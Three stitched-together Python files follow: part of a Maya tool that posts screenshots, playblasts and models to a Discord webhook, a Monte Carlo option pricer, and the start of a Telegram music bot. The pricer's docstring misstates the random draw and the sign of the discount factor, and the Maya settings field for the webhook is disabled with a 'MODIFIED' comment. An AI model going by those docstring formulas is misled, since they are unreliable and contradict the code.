# Main GUI Ends Here =================================================================================
# Creates Help GUI
def build_gui_help_maya_to_discord():
''' Builds the Help UI for GT Maya to Discord '''
window_name = "build_gui_help_maya_to_discord"
if cmds.window(window_name, exists=True):
cmds.deleteUI(window_name, window=True)
cmds.window(window_name, title= script_name + " Help", mnb=False, mxb=False, s=True)
cmds.window(window_name, e=True, s=True, wh=[1,1])
main_column = cmds.columnLayout(p= window_name)
# Title Text
cmds.separator(h=12, style='none') # Empty Space
cmds.rowColumnLayout(nc=1, cw=[(1, 310)], cs=[(1, 10)], p=main_column) # Window Size Adjustment
cmds.rowColumnLayout(nc=1, cw=[(1, 300)], cs=[(1, 10)], p=main_column) # Title Column
cmds.text(script_name + " Help", bgc=[.4,.4,.4], fn="boldLabelFont", align="center")
cmds.separator(h=10, style='none', p=main_column) # Empty Space
# Body ====================
help_font = 'smallPlainLabelFont'
cmds.rowColumnLayout(nc=1, cw=[(1, 300)], cs=[(1,10)], p=main_column)
cmds.text(l=script_name + ' allows you to quickly send', align="center")
cmds.text(l='images and videos (playblasts) from Maya to Discord', align="center")
cmds.text(l='using a Discord Webhook to bridge the two programs.', align="center")
cmds.separator(h=10, style='none') # Empty Space
cmds.text(l='Webhooks:', align="center", fn="boldLabelFont")
cmds.text(l='A webhook (a.k.a. web callback or HTTP push API) is a way for', align="center", font=help_font)
cmds.text(l='an app to provide other applications with real-time information.', align="center", font=help_font)
cmds.text(l='You can use it to send messages to text channels without', align="center", font=help_font)
cmds.text(l='needing the discord application.', align="center", font=help_font)
cmds.separator(h=10, style='none') # Empty Space
cmds.text(l='How to get a Webhook URL:', align="center", fn="boldLabelFont")
cmds.text(l='If you own a Discord server or you have the correct privileges, ', align="center", font=help_font)
cmds.text(l='you can go to the settings to create a Webhook URL.', align="center", font=help_font)
cmds.separator(h=7, style='none') # Empty Space
cmds.text(l='To create one go to:', align="center", font=help_font)
cmds.text(l='Discord > Server > Server Settings > Webhooks > Create Webhook', align="center", font=help_font)
cmds.text(l='Give your webhook a name and select which channel it will operate in.', align="center", font=help_font)
cmds.text(l='Copy the "Webhook URL" and load it in the settings for this script.', align="center", font=help_font)
cmds.separator(h=7, style='none') # Empty Space
cmds.text(l='If you\'re just a user in the server, you\'ll have to ask the', align="center", font=help_font)
cmds.text(l='administrator of the server to provide you with a Webhook URL.', align="center", font=help_font)
cmds.separator(h=10, style='none') # Empty Space
cmds.text(l='Send Buttons:', align="center", fn="boldLabelFont")
cmds.text(l='Send Message Only: Sends only the attached message', align="center", font=help_font)
cmds.text(l='(Use the textfield above the buttons to type your message)', align="center", font=help_font)
cmds.separator(h=10, style='none') # Empty Space
cmds.text(l='Send Desktop Screenshot: Sends a screenshot of your desktop.', align="center", font=help_font)
cmds.text(l='(This includes other programs and windows that are open)', align="center", font=help_font)
cmds.separator(h=7, style='none') # Empty Space
cmds.text(l='Send Maya Window: Sends only the main Maya window.', align="center", font=help_font)
cmds.text(l='(This ignores other windows, even within Maya)', align="center", font=help_font)
cmds.separator(h=7, style='none') # Empty Space
cmds.text(l='Send Viewport: Sends an image of the active viewport', align="center", font=help_font)
cmds.text(l='(Includes Heads Up Display text, but no UI elements)', align="center", font=help_font)
cmds.separator(h=7, style='none') # Empty Space
cmds.text(l='Send Playblast: Sends a playblast video', align="center", font=help_font)
cmds.text(l='(Use the script settings to determine details about the video)', align="center", font=help_font)
cmds.separator(h=7, style='none') # Empty Space
cmds.text(l='Send OBJ/FBX: Sends a model using the chosen format', align="center", font=help_font)
cmds.text(l='For settings, go to "File > Export Selection... > Options"', align="center", font=help_font)
cmds.separator(h=7, style='none') # Empty Space
cmds.text(l='Settings:', align="center", fn="boldLabelFont")
cmds.text(l='The settings are persistent, which means they will stay the same', align="center", font=help_font)
cmds.text(l='between Maya sessions.', align="center", font=help_font)
cmds.separator(h=7, style='none') # Empty Space
cmds.text(l='Custom Username:', align="center", font=help_font)
cmds.text(l='Nickname used when posting content through the webhook.', align="center", font=help_font)
cmds.separator(h=7, style='none') # Empty Space
cmds.text(l='Image & Video Format', align="center", font=help_font)
cmds.text(l='Extension used for the image and video files.', align="center", font=help_font)
cmds.separator(h=7, style='none') # Empty Space
cmds.text(l='Video Options:', align="center", font=help_font)
cmds.text(l='Determines the settings used when recording a playblast.', align="center", font=help_font)
cmds.separator(h=7, style='none') # Empty Space
cmds.text(l='Feedback and Timestamp Options:', align="center", font=help_font)
cmds.text(l='Determines feedback visibility and timestamp use.', align="center", font=help_font)
cmds.separator(h=10, style='none') # Empty Space
cmds.text(l='Limitations:', align="center", fn="boldLabelFont")
cmds.text(l='Discord has a limit of 8MB for free users and 50MB for paid users', align="center", font=help_font)
cmds.text(l='when uploading a file. If you get the error "Payload Too Large"', align="center", font=help_font)
cmds.text(l='it means your file exceeds the limits. Try changing the settings.', align="center", font=help_font)
cmds.separator(h=15, style='none') # Empty Space
cmds.rowColumnLayout(nc=2, cw=[(1, 140),(2, 140)], cs=[(1,10),(2, 0)], p=main_column)
cmds.text('Guilherme Trevisan ')
cmds.text(l='<a href="mailto:trevisangmw@gmail.com">TrevisanGMW@gmail.com</a>', hl=True, highlightColor=[1,1,1])
cmds.rowColumnLayout(nc=2, cw=[(1, 140),(2, 140)], cs=[(1,10),(2, 0)], p=main_column)
cmds.separator(h=15, style='none') # Empty Space
cmds.text(l='<a href="https://github.com/TrevisanGMW">Github</a>', hl=True, highlightColor=[1,1,1])
cmds.separator(h=7, style='none') # Empty Space
# Close Button
cmds.rowColumnLayout(nc=1, cw=[(1, 300)], cs=[(1,10)], p=main_column)
cmds.separator(h=10, style='none')
cmds.button(l='Reset Persistent Settings', h=30, c=lambda args: reset_persistent_settings_maya_to_discord())
cmds.separator(h=5, style='none')
cmds.button(l='OK', h=30, c=lambda args: close_help_gui())
cmds.separator(h=8, style='none')
# Show and Lock Window
cmds.showWindow(window_name)
cmds.window(window_name, e=True, s=False)
# Set Window Icon
qw = omui.MQtUtil.findWindow(window_name)
if python_version == 3:
widget = wrapInstance(int(qw), QWidget)
else:
widget = wrapInstance(long(qw), QWidget)
icon = QIcon(':/question.png')
widget.setWindowIcon(icon)
def close_help_gui():
if cmds.window(window_name, exists=True):
cmds.deleteUI(window_name, window=True)
def build_gui_settings_maya_to_discord():
''' Builds the Settings UI for GT Maya to Discord '''
window_name = "build_gui_settings_maya_to_discord"
if cmds.window(window_name, exists=True):
cmds.deleteUI(window_name, window=True)
cmds.window(window_name, title= script_name + " Settings", mnb=False, mxb=False, s=True)
cmds.window(window_name, e=True, s=True, wh=[1,1])
main_column = cmds.columnLayout(p= window_name)
# Title Text
cmds.separator(h=12, style='none') # Empty Space
cmds.rowColumnLayout(nc=1, cw=[(1, 310)], cs=[(1, 10)], p=main_column) # Window Size Adjustment
cmds.rowColumnLayout(nc=1, cw=[(1, 300)], cs=[(1, 10)], p=main_column) # Title Column
cmds.text(script_name + " Settings", bgc=[.4,.4,.4], fn="boldLabelFont", align="center")
cmds.separator(h=10, style='none', p=main_column) # Empty Space
# Current Settings =================
current_image_format = gt_mtod_settings_submit_ss.get('image_format')
current_video_format = gt_mtod_settings_submit_ss.get('video_format')
current_webhook = ''
current_custom_username = ''
if not gt_mtod_settings_submit_ss.get('is_first_time_running'):
if gt_mtod_settings_submit_ss.get('discord_webhook') != '':
current_webhook = gt_mtod_settings_submit_ss.get('discord_webhook')
if gt_mtod_settings_submit_ss.get('custom_username') != '':
current_custom_username = gt_mtod_settings_submit_ss.get('custom_username')
current_video_scale = gt_mtod_settings_submit_ss.get('video_scale_pct')
current_compression = gt_mtod_settings_submit_ss.get('video_compression')
current_output_type = gt_mtod_settings_submit_ss.get('video_output_type')
# Body ====================
cmds.rowColumnLayout(nc=1, cw=[(1, 300)], cs=[(1,10)], p=main_column)
cmds.text(l='Discord Webhook Url', align="center")
cmds.separator(h=5, style='none') # Empty Space
new_webhook_input = cmds.textField(pht='https://discordapp.com/api/webhooks/...', text=current_webhook, font= 'smallPlainLabelFont', enable=False) # MODIFIED
cmds.separator(h=10, style='none') # Empty Space
cmds.rowColumnLayout(nc=3, cw=[(1, 120),(2, 85),(3, 85)], cs=[(1,10),(2,5),(3,5)], p=main_column)
cmds.text(l='Custom Username ', align="center")
cmds.text(l='Image Format ', align="center")
cmds.text(l='Video Format ', align="center")
new_username_input = cmds.textField(pht='username (not required)', text=current_custom_username, font= 'smallPlainLabelFont')
new_image_format_input = cmds.textField(pht='jpg', text=current_image_format, font= 'smallPlainLabelFont')
new_video_format_input = cmds.textField(pht='mov', text=current_video_format, font= 'smallPlainLabelFont')
cmds.separator(h=10, style='none') # Empty Space
cmds.rowColumnLayout(nc=3, cw=[(1, 90),(2, 95),(3, 105)], cs=[(1,10),(2,5),(3,5)], p=main_column)
cmds.text(l='Video Scale % ', align="center", font= 'smallPlainLabelFont')
cmds.text(l='Video Compression ', align="center", font= 'smallPlainLabelFont')
cmds.text(l='Video Output Type ', align="center", font= 'smallPlainLabelFont')
video_scale_input = cmds.intSliderGrp( field=True, minValue=1, maxValue=100, fieldMinValue=1, fieldMaxValue=100, value=current_video_scale, cw=([1,35],[2,65]))
compression_input = cmds.optionMenu()
try:
for name in get_available_playblast_compressions(current_output_type):
cmds.menuItem( label=name )
# Find stored menuItem and select it
for idx,obj in enumerate(cmds.optionMenu(compression_input, q=True, itemListLong=True)):
if cmds.menuItem( obj , q=True, label=True ) == current_compression:
cmds.optionMenu(compression_input, e=True, select=idx+1) # 1-based selection
except:
cmds.menuItem( label='none' )
output_type_input = cmds.optionMenu(cc=lambda args: update_available_compressions())
cmds.menuItem( label='qt' )
cmds.menuItem( label='avi' )
cmds.menuItem( label='movie' )
# Find stored menuItem and select it
for idx,obj in enumerate(cmds.optionMenu(output_type_input,q=True, itemListLong=True)):
if cmds.menuItem( obj , q=True, label=True ) == current_output_type:
cmds.optionMenu(output_type_input, e=True, select=idx+1)
cmds.separator(h=10, style='none') # Empty Space
cmds.rowColumnLayout(nc=2, cw=[(1, 140),(2, 140)], cs=[(1,10),(2, 0)], p=main_column)
cmds.rowColumnLayout(nc=4, cw=[(1, 15),(2, 140),(3, 15),(4, 100)], cs=[(1,20),(2,5),(3,5)], p=main_column)
feedback_visibility_chk = cmds.checkBox(label='', value=gt_mtod_settings_submit_ss.get('feedback_visibility'), cc=lambda args: update_checkbox_settings_data())
cmds.text(l='Display Viewport Feedback', align="left", font= 'smallPlainLabelFont')
timestamp_visibility_chk = cmds.checkBox(label='', value=gt_mtod_settings_submit_ss.get('timestamp_visibility'), cc=lambda args: update_checkbox_settings_data())
cmds.text(l='Include Timestamp', align="center", font= 'smallPlainLabelFont')
cmds.separator(h=10, style='none') # Empty Space
# Bottom Buttons
cmds.rowColumnLayout(nc=2, cw=[(1, 145),(2, 145)], cs=[(1,10),(2,10)], p=main_column)
cmds.button(l='Reset Settings', h=30, c=lambda args: reset_settings())
cmds.button(l='Reset Webhook', c=lambda args: cmds.textField(new_webhook_input, e=True, text=''))
cmds.separator(h=5, style='none')
cmds.rowColumnLayout(nc=1, cw=[(1, 300)], cs=[(1,10)], p=main_column)
cmds.button(l='Apply', h=30, bgc=(.6, .6, .6), c=lambda args: apply_settings())
cmds.separator(h=8, style='none')
# Show and Lock Window
cmds.showWindow(window_name)
cmds.window(window_name, e=True, s=False)
# Set Window Icon
qw = omui.MQtUtil.findWindow(window_name)
if python_version == 3:
widget = wrapInstance(int(qw), QWidget)
else:
widget = wrapInstance(long(qw), QWidget)
icon = QIcon(':/toolSettings.png')
widget.setWindowIcon(icon)
def update_available_compressions():
''' Updates items stored in the optionMenu to contain only compatible compressions '''
try:
cmds.optionMenu(compression_input, e=True, dai=True)
for name in get_available_playblast_compressions(cmds.optionMenu(output_type_input, q=True, value=True)):
cmds.menuItem( label=name, p=compression_input)
except:
cmds.menuItem( label='none', p=compression_input )
def reset_settings():
'''
Resets the fields in the settings window (does not affect stored variables or persistent settings)
It uses a deep copy of the settings dictionary to reset it.
'''
cmds.textField(new_username_input, e=True, text=gt_mtod_settings_submit_ss_default.get('custom_username'))
cmds.textField(new_image_format_input, e=True, text=gt_mtod_settings_submit_ss_default.get('image_format'))
cmds.textField(new_video_format_input, e=True, text=gt_mtod_settings_submit_ss_default.get('video_format') )
for idx,obj in enumerate(cmds.optionMenu(output_type_input,q=True, itemListLong=True)):
if cmds.menuItem( obj , q=True, label=True ) == gt_mtod_settings_submit_ss_default.get('video_output_type'):
cmds.optionMenu(output_type_input, e=True, select=idx+1)
update_available_compressions()
found_default = False
for idx,obj in enumerate(cmds.optionMenu(compression_input, q=True, itemListLong=True)):
if cmds.menuItem( obj , q=True, label=True ) == gt_mtod_settings_submit_ss_default.get('video_compression'):
cmds.optionMenu(compression_input, e=True, select=idx+1)
found_default = True
if not found_default:
cmds.menuItem( label='none', p=compression_input )
cmds.intSliderGrp(video_scale_input, e=True, value=gt_mtod_settings_submit_ss_default.get('video_scale_pct'))
# Check box Management
cmds.checkBox(feedback_visibility_chk, e=True, value=gt_mtod_settings_submit_ss_default.get('feedback_visibility'))
cmds.checkBox(timestamp_visibility_chk, e=True, value=gt_mtod_settings_submit_ss_default.get('timestamp_visibility'))
update_checkbox_settings_data()
def apply_settings():
''' Transfer new settings to variables and store them as persistent settings '''
set_persistent_settings_maya_to_discord(cmds.textField(new_username_input, q=True, text=True), cmds.textField(new_webhook_input, q=True, text=True),\
cmds.textField(new_image_format_input, q=True, text=True), cmds.textField(new_video_format_input, q=True, text=True),\
cmds.intSliderGrp(video_scale_input, q=True, value=True), cmds.optionMenu(compression_input, q=True, value=True),\
cmds.optionMenu(output_type_input, q=True, value=True))
gt_mtod_settings_submit_ss['is_first_time_running'] = False
gt_mtod_settings_submit_ss['is_new_instance'] = True
build_gui_submit_screenshot()
if cmds.window(window_name, exists=True):
cmds.deleteUI(window_name, window=True)
def update_checkbox_settings_data():
feedback_visibility = cmds.checkBox(feedback_visibility_chk, q=True, value=True)
timestamp_visibility = cmds.checkBox(timestamp_visibility_chk, q=True, value=True)
cmds.optionVar( iv=('gt_maya_to_discord_feedback_visibility', int(feedback_visibility)) )
gt_mtod_settings_submit_ss['feedback_visibility'] = bool(cmds.optionVar(q=("gt_maya_to_discord_feedback_visibility")))
cmds.optionVar( iv=('gt_maya_to_discord_timestamp_visibility', int(timestamp_visibility)) )
gt_mtod_settings_submit_ss['timestamp_visibility'] = bool(cmds.optionVar(q=("gt_maya_to_discord_timestamp_visibility")))
def parse_discord_api(discord_webhook_full_path):
''' Parses and returns two strings to be used with HTTPSConnection instead of Http()
Parameters:
discord_webhook_full_path (str): Discord Webhook (Full Path)
Returns:
discord_api_host (str): Only the host used for discord's api
discord_api_repo (str): The rest of the path used to describe the webhook
'''
path_elements = discord_webhook_full_path.replace('https://','').replace('http://','').split('/')
host = ''
repo = ''
if len(path_elements) == 1:
raise Exception('Failed to parse Discord Webhook path.')
else:
host = path_elements[0]
for path_part in path_elements:
if path_part != host:
repo += '/' + path_part
return host, repo
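# Added illustration (not part of the original script): for a full webhook URL such as
# 'https://discordapp.com/api/webhooks/<id>/<token>', parse_discord_api() returns the pair
# ('discordapp.com', '/api/webhooks/<id>/<token>'), i.e. the host and the remaining path.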
def generate_temp_file(file_format, file_name='tmp'):
'''
Generates a temporary file path in the temp folder (usually "C:/Users/USERNAME/AppData/Local/Temp/tmp.ext"); the file itself is created by the caller
Parameters:
file_format (str) : Extension of the temp file
file_name (str): File name (Optional)
Returns:
file ('unicode'): Path to generated file
'''
temp_dir = cmds.internalVar(userTmpDir=True)
tmp_file = temp_dir + file_name + '.' + file_format
return tmp_file
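# Added illustration: generate_temp_file('jpg', file_name='desktop_screenshot') only joins Maya's
# user temp directory with the name and extension (e.g. ".../Temp/desktop_screenshot.jpg");
# the file itself is written later by the capture/export functions that receive this path.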
def capture_desktop_screenshot(image_file):
'''
Takes a snapshot of the entire Desktop and writes it to an image
Parameters:
image_file (str): File path for where to store generated image
Returns:
image_file (str): Returns the same path after storing data in it
'''
app = QtWidgets.QApplication.instance()
win = omui.MQtUtil_mainWindow()
if python_version == 3:
ptr = wrapInstance(int(win), QtWidgets.QMainWindow)
else:
ptr = wrapInstance(long(win), QtWidgets.QMainWindow)
screen_number = app.desktop().screenNumber(ptr)
screen_geometry = app.desktop().screenGeometry(screen_number)
frame = app.primaryScreen().grabWindow(0, screen_geometry.x(), screen_geometry.y(), screen_geometry.width(), screen_geometry.height())
frame.save(image_file)
return image_file
def capture_app_window(image_file):
'''
Takes a snapshot of the entire Qt App (Maya) and writes it to an image
Parameters:
image_file (str): File path for where to store generated image
Returns:
image_file (str): Returns the same path after storing data in it
'''
win = omui.MQtUtil_mainWindow()
if python_version == 3:
ptr = wrapInstance(int(win), QtWidgets.QMainWindow)
main_window_id = ptr.winId()
long_win_id = int(main_window_id)
else:
ptr = wrapInstance(long(win), QtWidgets.QMainWindow)
main_window_id = ptr.winId()
long_win_id = long(main_window_id)
frame = QtGui.QPixmap.grabWindow(long_win_id)
frame.save(image_file)
return image_file
def capture_viewport(image_file):
'''
Takes a snapshot of the active viewport and writes it to an image
Parameters:
image_file (str): File path for where to store generated image
Returns:
image_file (str): Returns the same path after storing data in it
'''
view = omui.M3dView.active3dView()
image = om.MImage()
view.readColorBuffer(image, True)
image.writeToFile(image_file)
return image_file
def discord_post_message(username, message, webhook_url):
'''
Sends a string message to Discord using a webhook
Parameters:
username (str): A string to be used as the username (Replaces bot name)
message (str): A string to be used as a message
webhook_url (str): A Discord Webhook to make the request
Returns:
response (dict): Returns the response generated by the http object
'''
if python_version == 3:
bot_message = {
'username': username,
'content': message
}
host, path = parse_discord_api(webhook_url)
connection = http.client.HTTPSConnection(host)
connection.request('POST', path, headers={'Content-Type': 'application/json; charset=UTF-8', 'User-Agent' : 'gt_maya_to_discord/' + str(script_version)} , body=dumps(bot_message))
response = connection.getresponse()
return tuple([response])
#response_headers = dict(response.getheaders())
#response_headers['status'] = response.status
#response_headers['reason'] = response.reason
#return tuple([response_headers])
else:
bot_message = {
'username': username,
'content': message
}
message_headers = {'Content-Type': 'application/json; charset=UTF-8'}
http_obj = Http()
response = http_obj.request(
uri=webhook_url,
method='POST',
headers=message_headers,
body=dumps(bot_message),
)
return response
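# Hedged usage note (added): the send_* functions above call this roughly as
# discord_post_message(get_username(), 'some text', gt_mtod_settings_submit_ss.get('discord_webhook'))
# and later read response[0].status through parse_sending_response / response_inview_feedback.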
def encode_multipart(fields, files, boundary=None):
'''
Encode dict of form fields and dict of files as multipart/form-data.
Return tuple of (body_string, headers_dict). Each value in files is a dict
with required keys 'filename' and 'content', and optional 'mimetype' (if
not specified, tries to guess mime type or uses 'application/octet-stream').
>>> body, headers = encode_multipart({'FIELD': 'VALUE'},
... {'FILE': {'filename': 'F.TXT', 'content': 'CONTENT'}},
... boundary='BOUNDARY')
>>> print('\n'.join(repr(l) for l in body.split('\r\n')))
'--BOUNDARY'
'Content-Disposition: form-data; name="FIELD"'
''
'VALUE'
'--BOUNDARY'
'Content-Disposition: form-data; name="FILE"; filename="F.TXT"'
'Content-Type: text/plain'
''
'CONTENT'
'--BOUNDARY--'
''
'''
def escape_quote(s):
return s.replace('"', '\\"')
if boundary is None:
boundary = ''.join(random.choice(_BOUNDARY_CHARS) for i in range(30))
lines = []
for name, value in fields.items():
lines.extend((
'--{0}'.format(boundary),
'Content-Disposition: form-data; name="{0}"'.format(escape_quote(name)),
'',
str(value),
))
for name, value in files.items():
filename = value['filename']
if 'mimetype' in value:
mimetype = value['mimetype']
else:
mimetype = mimetypes.guess_type(filename)[0] or 'application/octet-stream'
lines.extend((
'--{0}'.format(boundary),
'Content-Disposition: form-data; name="{0}"; filename="{1}"'.format(
escape_quote(name), escape_quote(filename)),
'Content-Type: {0}'.format(mimetype),
'',
value['content'],
))
lines.extend((
'--{0}--'.format(boundary),
'',
))
clean_lines = [] # Only Bytes
for line in lines:
if type(line) == bytes:
clean_lines.append(line)
else:
clean_lines.append(bytes(line, 'utf-8'))
body = b'\r\n'.join(clean_lines)
headers = {
'Content-Type': 'multipart/form-data; boundary={0}'.format(boundary),
'Content-Length': str(len(body)),
}
print((body, headers))
return (body, headers)
def discord_post_attachment(username, message, file_path, webhook_url):
'''
Sends a message and an attachment to Discord using a webhook
Parameters:
username (str): A string to be used as the username (replaces bot name)
message (str): A string to be used as a message
file_path (str): A path for a file that will be uploaded
webhook_url (str): A Discord Webhook to make the request
Returns:
response (dict): Returns the response generated by the http object
'''
if python_version == 3:
fields = { 'content' : message, 'username' : username}
file_name = file_path.split('/')[-1]
files = {'file1': {'filename': file_name, 'content': open(file_path, "rb").read()}}
data, headers = encode_multipart(fields, files)
host, path = parse_discord_api(webhook_url)
connection = http.client.HTTPSConnection(host)
connection.request('POST', path, headers=headers , body=data)
response = connection.getresponse()
return tuple([response])
else:
fields = { 'content' : message, 'username' : username}
file_name = file_path.split('/')[-1]
files = {'file1': {'filename': file_name, 'content': open(file_path, "rb").read()}}
data, headers = encode_multipart(fields, files)
http_obj = Http()
response = http_obj.request(
uri=webhook_url,
method='POST',
headers=headers,
body=data
)
return response
def get_available_playblast_compressions(format):
return mel.eval('playblast -format "{0}" -q -compression;'.format(format))
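# Added note: the compressions returned depend on the codecs available in the local Maya install;
# for the 'qt' output type this might include entries such as 'H.264' or 'jpeg', and it can be
# empty, in which case the settings UI falls back to a single 'none' menu item.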
def update_discord_webhook_validity(webhook_url):
'''
Updates the validity of a webhook for when the script is run a second time.
This function updates the "settings" dictionary directly.
Parameters:
webhook_url (str): Discord Webhook URL
'''
success_codes = [200, 201, 202, 203, 204, 205, 206]
if python_version == 3:
try:
host, path = parse_discord_api(webhook_url)
connection = http.client.HTTPSConnection(host)
connection.request('GET', path, headers={'Content-Type': 'application/json; charset=UTF-8', 'User-Agent' : 'gt_maya_to_discord/' + str(script_version)})
response = connection.getresponse()
response_content_dict = loads(response.read())
if response.status in success_codes:
response_content_dict.get('name')
gt_mtod_settings_submit_ss['is_new_instance'] = False
gt_mtod_settings_submit_ss['is_webhook_valid'] = True
else:
gt_mtod_settings_submit_ss['is_new_instance'] = False
gt_mtod_settings_submit_ss['is_webhook_valid'] = False
except:
gt_mtod_settings_submit_ss['is_new_instance'] = False
gt_mtod_settings_submit_ss['is_webhook_valid'] = False
else:
try:
http_obj = Http()
response, content = http_obj.request(webhook_url)
if response.status in success_codes:
response_content_dict = loads(content)
response_content_dict.get('name')
gt_mtod_settings_submit_ss['is_new_instance'] = False
gt_mtod_settings_submit_ss['is_webhook_valid'] = True
else:
gt_mtod_settings_submit_ss['is_new_instance'] = False
gt_mtod_settings_submit_ss['is_webhook_valid'] = False
except:
gt_mtod_settings_submit_ss['is_new_instance'] = False
gt_mtod_settings_submit_ss['is_webhook_valid'] = False
def discord_get_webhook_name(webhook_url):
'''
Requests the name of the webhook and returns a string representing it
Parameters:
webhook_url (str): Discord Webhook URL
Returns:
name (str): The name of the webhook (or error string, if operation failed)
'''
try:
http_obj = Http()
response, content = http_obj.request(webhook_url)
success_codes = [200, 201, 202, 203, 204, 205, 206]
if response.status in success_codes:
response_content_dict = loads(content)
return response_content_dict.get('name')
else:
return 'Error reading webhook response'
except:
cmds.warning('Error connecting to provided webhook. Make sure you\'re pasting the correct URL')
return 'Error connecting to webhook'
def get_readable_size(size, precision=2):
'''
Returns a human readable version of the size of a file
Parameters:
size (float or int) : size of the file in bytes
precision (int) : precision of the returned result
Returns:
formatted_string (string) : Size + Suffix
'''
suffixes=['B','KB','MB','GB','TB']
suffix_index = 0
while size > 1024 and suffix_index < 4:
suffix_index += 1
size = size/1024.0
return "%.*f%s"%(precision, size, suffixes[suffix_index])
def response_inview_feedback(operation_name, response, write_output=True, display_inview=True):
'''
Prints an inViewMessage to give feedback to the user about what is being executed.
Uses the module "random" to force identical messages to appear at the same time.
Parameters:
operation_name (string): name of the operation being displayed (e.g. playblast)
response (dict): A dictionary response received from a HTTP object after post/get operation.
write_output (bool): Determines if the function will write an extra output text (like a "Result: pCube1" text output)
display_inview (bool): Determines if generated message will be displayed as an inView message or not (visibility)
'''
message = '<' + str(random.random()) + '>'
if len(response) >= 1:
status_value = response[0].status
reason_value = response[0].reason
success_codes = [200, 201, 202, 203, 204, 205, 206]
if status_value in success_codes:
message += 'The ' + str(operation_name) + ' was <span style=\"color:#00FF00;text-decoration:underline;\">sent successfully</span>.'
if write_output:
sys.stdout.write('The ' + str(operation_name) + ' was sent successfully. Web response: ' + str(reason_value) + ' (' + str(status_value) + ')')
else: # Error
message += 'The ' + str(operation_name) + ' was <span style=\"color:#FF0000;text-decoration:underline;\">not sent</span>.'
if write_output:
sys.stdout.write('The ' + str(operation_name) + ' was not sent. Web response: ' + str(reason_value) + ' (' + str(status_value) + ')')
else:
message += 'The ' + str(operation_name) + ' was <span style=\"color:#FF0000;text-decoration:underline;\">not sent</span>.'
if write_output:
sys.stdout.write('The ' + str(operation_name) + ' was not sent. Error: Web response can\'t be read.')
if display_inview:
cmds.inViewMessage(amg=message, pos='botLeft', fade=True, alpha=.9)
if __name__ == '__main__':
#build_gui_submit_screenshot()
response = discord_post_attachment('userName', 'test', 'C:\\Users\\TrevisanGMW\\Desktop\\testFile.txt', gt_mtod_settings_submit_ss.get('discord_webhook'))
|
monte_carlo.py
|
"""
For each path of simulation, the final price is:
St = spot * exp((b - vol*vol/2) * T + vol * rand * sqrt(T))
where rand is a random number in (0, 1)
call option:
each_price = max(St - strike, 0)
put option:
each_price = max(strike - St, 0)
The overall price is:
sum(each_price) * exp(rate * T) / simu_num
"""
from math import exp, sqrt
from multiprocessing import Process, Queue
from random import random
from options.functions import norminv
from options.option import OptionType
# from scipy.stats import norm # norm.ppf is about 50 times slower than norminv but no obvious accuracy improvement
class MonteCarloPricer:
def __init__(self, simu_num=1000000, ps_num=10):
self.simu_num = simu_num
self.ps_num = ps_num
def set_ps_num(self, ps_num):
self.ps_num = ps_num
def get_price_of_one_run(self, z):
'''Run the simulation once and return the option price'''
#st = self.spot * exp((self.cost_of_carry - self.vol**2 / 2) * self.expiry + self.vol * norm.ppf(random()) * sqrt(self.expiry))
st = self.spot * exp((self.cost_of_carry - self.vol**2 / 2) * self.expiry + self.vol * norminv(random()) * sqrt(self.expiry))
return max(z * (st - self.strike), 0)
def _ps_slice(self, z, num, resultq):
sum = 0
for i in range(int(num)):
sum += self.get_price_of_one_run(z)
resultq.put(sum)
resultq.close()
def price_option(self, option):
"""
Price the given option via Monte Carlo, using simu_num and ps_num set in the constructor:
simu_num: the number of simulation runs, usually > 100000
ps_num: if zero, run the simulation in single-process mode;
otherwise run in multiprocess mode with ps_num processes to speed it up
"""
self.spot = option.spot
self.strike = option.strike
self.rate = option.rate
self.expiry = option.expiry
self.vol = option.vol
self.cost_of_carry = option.cost_of_carry or option.rate
z = 1 if option.type == OptionType.CALL else -1
sum = 0
if self.ps_num:
# multiprocess mode
if (self.simu_num / self.ps_num <= 1000): # with more than 1000 runs per process the dropped remainder (simu_num % ps_num) is negligible, so divisibility is only enforced for small slices
assert not self.simu_num % self.ps_num, \
'simu_num must be an integer multiple of ps_num; received simu_num: {}, ps_num: {}'.format(self.simu_num, self.ps_num)
resultq = Queue()
processes = [Process(target=self._ps_slice, args=(z, self.simu_num / self.ps_num, resultq)) for i in range(self.ps_num)]
for p in processes:
p.start()
for p in processes:
p.join()
while not resultq.empty():
sum += resultq.get()
else:
# single process mode
for i in range(self.simu_num):
sum += self.get_price_of_one_run(z)
return round(exp(- self.rate * self.expiry) * sum / self.simu_num, 4)
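# --- Added usage sketch (hedged illustration, not part of the original module) ---
# A single simulated path computed directly from the formula in the module docstring, using
# random.gauss as a stand-in for norminv(random()); the option parameters below are arbitrary.
if __name__ == '__main__':
    from random import gauss

    spot, strike, rate, vol, expiry = 100.0, 100.0, 0.05, 0.2, 1.0
    b = rate  # cost of carry taken equal to the rate, as price_option does when it is not set
    st = spot * exp((b - vol * vol / 2) * expiry + vol * gauss(0.0, 1.0) * sqrt(expiry))
    print('terminal price: %.4f, call payoff: %.4f' % (st, max(st - strike, 0)))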
|
scdlbot.py
|
# -*- coding: utf-8 -*-
"""Main module."""
import gc
import pathlib
import random
import shelve
import shutil
from datetime import datetime
from multiprocessing import Process, Queue
from queue import Empty
from subprocess import PIPE, TimeoutExpired # skipcq: BAN-B404
from urllib.parse import urljoin, urlparse
from uuid import uuid4
import ffmpeg
from boltons.urlutils import find_all_links
from mutagen.id3 import ID3
from mutagen.mp3 import EasyMP3 as MP3
from prometheus_client import Summary
from telegram import (Message, Chat, ChatMember, MessageEntity, ChatAction, InlineKeyboardMarkup,
InlineKeyboardButton, InlineQueryResultAudio, Update)
from telegram.error import (TelegramError, Unauthorized, BadRequest,
TimedOut, ChatMigrated, NetworkError)
from telegram.ext import (Updater, CommandHandler, MessageHandler, Filters, InlineQueryHandler,
CallbackQueryHandler, CallbackContext)
from telegram.ext.dispatcher import run_async
from scdlbot.utils import *
logger = logging.getLogger(__name__)
REQUEST_TIME = Summary('request_processing_seconds', 'Time spent processing request')
class ScdlBot:
def __init__(self, tg_bot_token, tg_bot_api="https://api.telegram.org", proxies=None,
store_chat_id=None, no_flood_chat_ids=None, alert_chat_ids=None,
dl_dir="/tmp/scdlbot", dl_timeout=300, max_tg_file_size=45_000_000, max_convert_file_size=80_000_000,
chat_storage_file="/tmp/scdlbotdata", app_url=None,
serve_audio=False, cookies_file=None, source_ips=None):
self.SITES = {
"sc": "soundcloud",
"scapi": "api.soundcloud",
"bc": "bandcamp",
"yt": "youtu",
}
self.APP_URL = app_url
self.DL_TIMEOUT = dl_timeout
self.TG_BOT_API = tg_bot_api
self.MAX_TG_FILE_SIZE = max_tg_file_size
self.MAX_CONVERT_FILE_SIZE = max_convert_file_size
self.SERVE_AUDIO = serve_audio
